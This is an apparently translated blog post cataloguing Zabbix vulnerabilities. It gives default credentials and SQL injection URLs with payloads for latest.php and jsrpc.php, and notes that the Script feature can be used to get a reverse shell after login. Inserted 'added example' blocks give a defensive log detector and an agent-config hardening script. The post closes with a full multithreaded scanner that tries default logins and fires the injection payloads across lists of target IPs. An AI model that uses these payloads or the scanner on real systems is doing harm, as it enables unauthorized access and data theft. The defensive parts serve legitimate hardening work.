Zabbix vulnerability roundup
I. Zabbix:
Zabbix is an enterprise-grade open-source solution that provides distributed system monitoring and network monitoring through a web interface. Zabbix can monitor a wide range of network parameters to keep server systems running securely, and it offers flexible notification mechanisms so that system administrators can quickly locate and resolve problems.
II. Zabbix vulnerabilities:
1. Weak passwords:
WeakPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]
2. SQL injection
(1)
Title: SQL injection in the toggle_ids[] parameter of latest.php
Attack conditions: after login
Impact: can lead to system-level access
URL and payload:
"""
http://a.b.c.d/latest.php?output=ajax&sid=<last 16 characters of the session id after login>&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
"""
(2)
Title: SQL injection in the profileIdx2 parameter of jsrpc.php
Attack conditions: no login required; a high-privilege sid and cookie obtained after login can also be substituted in
Impact: typical SQL injection impact
URL and payload:
"""
http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
"""
(3)
Title: other SQL injection vulnerabilities: the itemid and periods parameters of chart_bar.php; the applications parameter of httpmon.php
Attack conditions: unknown
Impact: unknown
URL and payload: try generic SQL injection payloads
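From the defender's side, the injection points above all share one property: the parameters Zabbix reads there (toggle_ids[], profileIdx2, itemid, periods, applications) are expected to hold plain integer ids, so a web-server access log can be swept for requests where they hold anything else. The following detector is an added example, not code from the original post; it assumes the integer-id expectation just stated, the Apache/nginx combined log format, and uses constructed sample log lines built from the payloads shown above.

```python
"""Added example: flag requests to the Zabbix scripts listed above whose id
parameters carry SQL metacharacters (constructed sample log lines, not real traffic)."""
import re
from urllib.parse import urlsplit, parse_qs

# Script name -> parameters the text above reports as injectable. The heuristic assumes
# Zabbix expects plain integer ids in all of them, so anything else is worth a look.
SUSPECT_PARAMS = {
    "jsrpc.php": {"profileIdx2"},
    "latest.php": {"toggle_ids[]"},
    "chart_bar.php": {"itemid", "periods"},
    "httpmon.php": {"applications"},
}
# SQL fragments seen in the payloads above plus the usual quoting/comment characters.
SQLI_MARKERS = re.compile(r"updatexml\s*\(|extractvalue\s*\(|\bselect\b|\bunion\b|\bor\b|['\")#]|--", re.I)
# Apache/nginx combined log format: client ip, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')


def check_request(uri):
    """Return [(param, decoded_value), ...] for suspect parameters of one request URI."""
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1]
    params = SUSPECT_PARAMS.get(script)
    if not params:
        return []
    findings = []
    # parse_qs splits each pair on its first '=' and percent-decodes the value
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name in params:
            for value in values:
                if not value.isdigit() and SQLI_MARKERS.search(value):
                    findings.append((name, value))
    return findings


def scan_log(lines):
    """Return [(client_ip, script, param, value), ...] for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        script = urlsplit(m.group("uri")).path.rsplit("/", 1)[-1]
        for param, value in check_request(m.group("uri")):
            hits.append((m.group("ip"), script, param, value))
    return hits


# Constructed sample log lines (ids and sid taken from the payloads above), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Aug/2016:05:06:32 +0000] "GET /zabbix/latest.php?output=ajax&sid=0bcd4ade648214dc&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385 HTTP/1.1" 200 512',
    '10.0.0.9 - - [17/Aug/2016:05:06:40 +0000] "GET /zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600 HTTP/1.1" 200 1024',
    '10.0.0.9 - - [17/Aug/2016:05:07:01 +0000] "GET /zabbix/latest.php?output=ajax&sid=0bcd4ade648214dc&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385);%20select%20*%20from%20users%20where%20(1=1 HTTP/1.1" 500 300',
    '10.0.0.7 - - [17/Aug/2016:05:07:30 +0000] "GET /zabbix/chart_bar.php?itemid=23297&periods=3600 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, script, param, value in scan_log(SAMPLE_LOG):
        print("[!] %s -> %s %s=%r" % (ip, script, param, value))
```

Only the two requests carrying the injection payloads are reported; the legitimate latest.php and chart_bar.php requests with numeric ids pass. Because the check is keyed on the parameter rather than on one fixed payload string, variants of the same injection (different functions, different comment terminators) are caught as long as they are not a bare integer.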
3. OS command injection / execution:
(1) After logging in with a weak password, the Script feature built into Zabbix can be used to run system commands, e.g. to obtain a reverse shell.
(2) Defense:
# Do not set AllowRoot=1, so that the agent and server do not start as root.
# Forbid the agent from executing system.run: do not set EnableRemoteCommands=1.
# Apply patches promptly.
4. A Python check script I wrote myself; flame me promptly if anything is wrong
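The two configuration points above can be checked mechanically on every agent host. The script below is an added example, not part of the original post or of Zabbix itself: it parses a zabbix_agentd.conf-style Key=Value file, reports whether AllowRoot or EnableRemoteCommands is switched on (both default to 0 in the agent), and emits a hardened copy with those settings forced to 0. The sample configuration is constructed for the example.

```python
"""Added example: audit a zabbix_agentd.conf for the two settings the text above says
must not be enabled, and emit a hardened copy (constructed sample config, not a real one)."""

# Setting -> why it matters. Both default to 0 in the Zabbix agent.
RISKY_SETTINGS = {
    "AllowRoot": "agent keeps running as root instead of dropping to the zabbix user",
    "EnableRemoteCommands": "server can execute arbitrary commands through system.run[]",
}


def parse_agent_conf(text):
    """Parse Key=Value lines; full-line '#' comments and blanks are skipped, last duplicate wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def audit_agent_conf(text):
    """Return [(setting, reason), ...] for every risky setting that is switched on."""
    settings = parse_agent_conf(text)
    return [(key, why) for key, why in RISKY_SETTINGS.items() if settings.get(key, "0") == "1"]


def harden_agent_conf(text):
    """Return the config text with every risky setting forced to 0; other lines are kept verbatim."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        key = line.split("=", 1)[0].strip() if "=" in line and not line.startswith("#") else None
        out.append("%s=0" % key if key in RISKY_SETTINGS else raw)
    return "\n".join(out) + "\n"


# Constructed sample of a weakly configured agent (not a real host's config).
WEAK_CONF = """# zabbix_agentd.conf (constructed sample)
Server=192.0.2.10
ServerActive=192.0.2.10
Hostname=web01
AllowRoot=1
EnableRemoteCommands=1
LogRemoteCommands=1
"""

if __name__ == "__main__":
    for key, why in audit_agent_conf(WEAK_CONF):
        print("[-] %s=1: %s" % (key, why))
    print(harden_agent_conf(WEAK_CONF))
```

Run it against /etc/zabbix/zabbix_agentd.conf (read the file into `text`) from a configuration-management job and fail the job when `audit_agent_conf` returns anything; the hardened output can be diffed against the live file before it is deployed.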
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""
This Python script is for "Zabbix" VulnScan!
Author:ChenRan
Company:360.net
"""
# import lib files
import os
import sys
import time
import logging
import datetime
import threading

import requests
from bs4 import BeautifulSoup
from optparse import OptionParser

# global variables
ZabbixTarget = None  # target ip address
ZabbixFile = None    # file with one target ip per line
BlackList = [        # markers that mean the login page was rendered again (login failed)
    'incorrect',
    '<!-- Login Form -->'
]
USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'

# global config
logging.basicConfig(level=logging.INFO, format='%(message)s')


# global functions
def Config_Init():
    """
    Prepend "http://" to the ip address(es) to build the target url list.
    """
    if ZabbixTarget:
        return ["http://%s" % ZabbixTarget]
    elif ZabbixFile:
        targetlist = []
        with open(ZabbixFile, "r") as fr:
            for ip in fr:
                ip = ip.strip()
                if ip:
                    targetlist.append("http://%s" % ip)
        return targetlist
    else:
        return []


def get_post_data(page_content):
    """
    Collect the form fields of the login page html as post data.
    """
    postdata = {}
    soup = BeautifulSoup(page_content, "html.parser")
    for inputparameter in soup.find_all('input'):
        if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs:
            postdata[inputparameter['name']] = inputparameter['value']
    return postdata


def report_file_allinone():
    """Merge the per-thread result files into a single csv report."""
    vulnlist = []
    for filename in os.listdir("."):
        if "zabbix_vulnscan_result" in filename:
            with open(filename, "r") as fr:
                vulnlist.extend(fr.readlines())
            os.remove(filename)
    with open("zabbix_vuln_report_%s.csv" % datetime.date.today(), "w") as fw:
        fw.write("vuln-IP,Vuln-Type,Scan-Time\n")
        for line in vulnlist:
            fw.write(line)


# Zabbix scan class
class ZabbixScan:
    def __init__(self, targetlist):
        """
        VulnExpPHPFile:
        //0-login-weakpassword
        //1-httpmon.php parameter->applications
        //2-chart_bar.php parameter->itemid
        //3-jsrpc.php parameter->profileIdx2
        //4-latest.php parameter->toggle_ids[]
        //5-OS_Injection->once logged in you can run your own scripts!
        TestTarget:
        //0-login-weakpassword
        //1-jsrpc.php
        //2-latest.php
        """
        # default password dictionary
        self._weakpassword = [{"username": "Admin", "password": "zabbix"},
                              {"username": "admin", "password": "zabbix"},
                              {"username": "guest", "password": ""}]
        self._targetlist = targetlist       # targets waiting to be scanned
        self._size = len(self._targetlist)  # number of targets
        self._sqlinjectionurl1_vulnlist = []
        self._sqlinjectionurl2_vulnlist = []
        self._login_weakpassword_vulnlist = []
        self._login_weakpassword_safelist = []

    def __len__(self):
        """return size of targetlist"""
        return self._size

    def _login(self, request, target, user, pswd):
        """Fetch the login form, fill in the credentials and post it. Returns the response or None."""
        headers = {'User-Agent': USER_AGENT}
        try:
            response = request.get(target, headers=headers, timeout=3)
        except requests.RequestException:
            return None
        if response.status_code != 200:
            return None
        postdata = get_post_data(response.text)
        postdata["user"] = user
        postdata["password"] = pswd
        headers["Referer"] = target
        try:
            return request.post(target + "/index.php", headers=headers, data=postdata, timeout=3)
        except requests.RequestException:
            return None

    def _scan_default_password_login(self):
        for authinfo in self._weakpassword:
            user = authinfo["username"]
            pswd = authinfo["password"]
            for target in self._targetlist:
                logging.info("[*] Target:%s Payload:%s" % (target, authinfo))
                request = requests.session()
                response = self._login(request, target, user, pswd)
                # a successful login renders the dashboard (which calls chkbxRange.init())
                # without any of the "login failed" markers from BlackList
                if (response is not None and "chkbxRange.init();" in response.text
                        and not any(flag in response.text for flag in BlackList)):
                    self._login_weakpassword_vulnlist.append((target, user, pswd))
                else:
                    self._login_weakpassword_safelist.append(target)
                request.close()

    def _sqlinjectionurl1_scan(self):
        logging.info("[*] latest.php sqlinjection scan!")
        for vulntarget in self._login_weakpassword_vulnlist:
            target, user, pswd = vulntarget
            request = requests.session()
            response = self._login(request, target, user, pswd)
            cookies = list(request.cookies.values())
            if response is None or not cookies:
                request.close()
                continue
            # sid is the last 16 characters of the session cookie
            sessionid = cookies[0][-16:]
            scanurl = (target + "/latest.php?output=ajax&sid=" + sessionid
                       + "&favobj=toggle&toggle_open_state=1&toggle_ids[]=1%^&*%22%27()-*#")
            try:
                response = request.get(scanurl, headers={'User-Agent': USER_AGENT}, timeout=20)
            except requests.RequestException:
                request.close()
                continue
            if "SQL syntax" in response.text:
                self._sqlinjectionurl1_vulnlist.append(vulntarget)
            request.close()

    def _sqlinjectionurl2_scan(self):
        logging.info("[*] jsrpc.php sqlinjection scan!")
        for vulntarget in self._targetlist:
            scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
            headers = {'User-Agent': USER_AGENT}
            try:
                response = requests.get(scanurl, headers=headers, timeout=20)
            except requests.RequestException:
                continue
            # the updatexml() error message leaks the (truncated) md5(0x11) hash
            if "ed733b8d10be255eceba344d533586" in response.text:
                self._sqlinjectionurl2_vulnlist.append(vulntarget)

    def scan_run(self):
        self._scan_default_password_login()
        self._sqlinjectionurl1_scan()
        self._sqlinjectionurl2_scan()


class scanthread(threading.Thread):
    def __init__(self, threadname, targetlist):
        threading.Thread.__init__(self, name=threadname)
        self.scanner = ZabbixScan(targetlist)
        self.targetlist = targetlist

    def _create_csv(self):
        scantime = str(datetime.datetime.now())
        results = [
            (self.scanner._login_weakpassword_vulnlist, "weakpassword"),
            (self.scanner._sqlinjectionurl1_vulnlist, "latest.php-SQLI"),
            (self.scanner._sqlinjectionurl2_vulnlist, "jsrpc.php-SQLI"),
        ]
        with open("zabbix_vulnscan_result_%s_%s" % (time.time(), self.name), "w") as fw:
            for vulnlist, vulntype in results:
                for vuln in vulnlist:
                    # weak password and latest.php entries are (target,user,pswd) tuples,
                    # jsrpc.php entries are plain target urls
                    target = vuln[0] if isinstance(vuln, tuple) else vuln
                    target = target.split("http://")[-1]
                    fw.write("%s,%s,%s\n" % (target, vulntype, scantime))

    def run(self):
        self.scanner.scan_run()
        self._create_csv()


if __name__ == "__main__":
    logging.info("[+]*****************************************************************[+]")
    logging.info("Zabbix Scan Init!")
    parser = OptionParser()
    parser.add_option("-i", "--iptarget", dest="iptarget", help="Target IP address!")
    parser.add_option("-f", "--iptargetfile", dest="iptargetfile", help="Target IPs file!")
    parser.add_option("-t", "--threadnum", dest="threadnum", help="Number of threads to scan with!")
    (options, args) = parser.parse_args()
    if not options.iptarget and not options.iptargetfile:
        logging.error("[-] Target parameters error!")
        sys.exit(0)
    try:
        threadnum = int(options.threadnum) if options.threadnum else 1
        if threadnum < 1:
            raise ValueError("threadnum must be >= 1")
    except ValueError:
        logging.error("[-] Threadnum parameter error!")
        sys.exit(0)
    ZabbixTarget = options.iptarget
    ZabbixFile = options.iptargetfile
    logging.info("[+] Scan Config Init!")
    targetlist = Config_Init()
    targetsize = len(targetlist)
    logging.info("[+] Scan Target Number:%s" % targetsize)
    logging.info("[+] Scan Threads Init")
    # split the targets into chunks of at least one target, one thread per chunk
    threadtargetsize = max(1, targetsize // threadnum)
    threadlist = []
    for nameflag, start in enumerate(range(0, targetsize, threadtargetsize)):
        threadname = "scan-thread-%s" % nameflag
        threadlist.append(scanthread(threadname, targetlist[start:start + threadtargetsize]))
    logging.info("[+] Scan Thread Start!")
    for thread in threadlist:
        thread.start()
        time.sleep(2)
        logging.info("[+] %s --Start!" % thread.name)
    for thread in threadlist:
        thread.join()
    logging.info("[+] Scan Finished!")
    logging.info("[+] Report Creating!")
    report_file_allinone()
    logging.info("[+] Report Create!")
    sys.exit(0)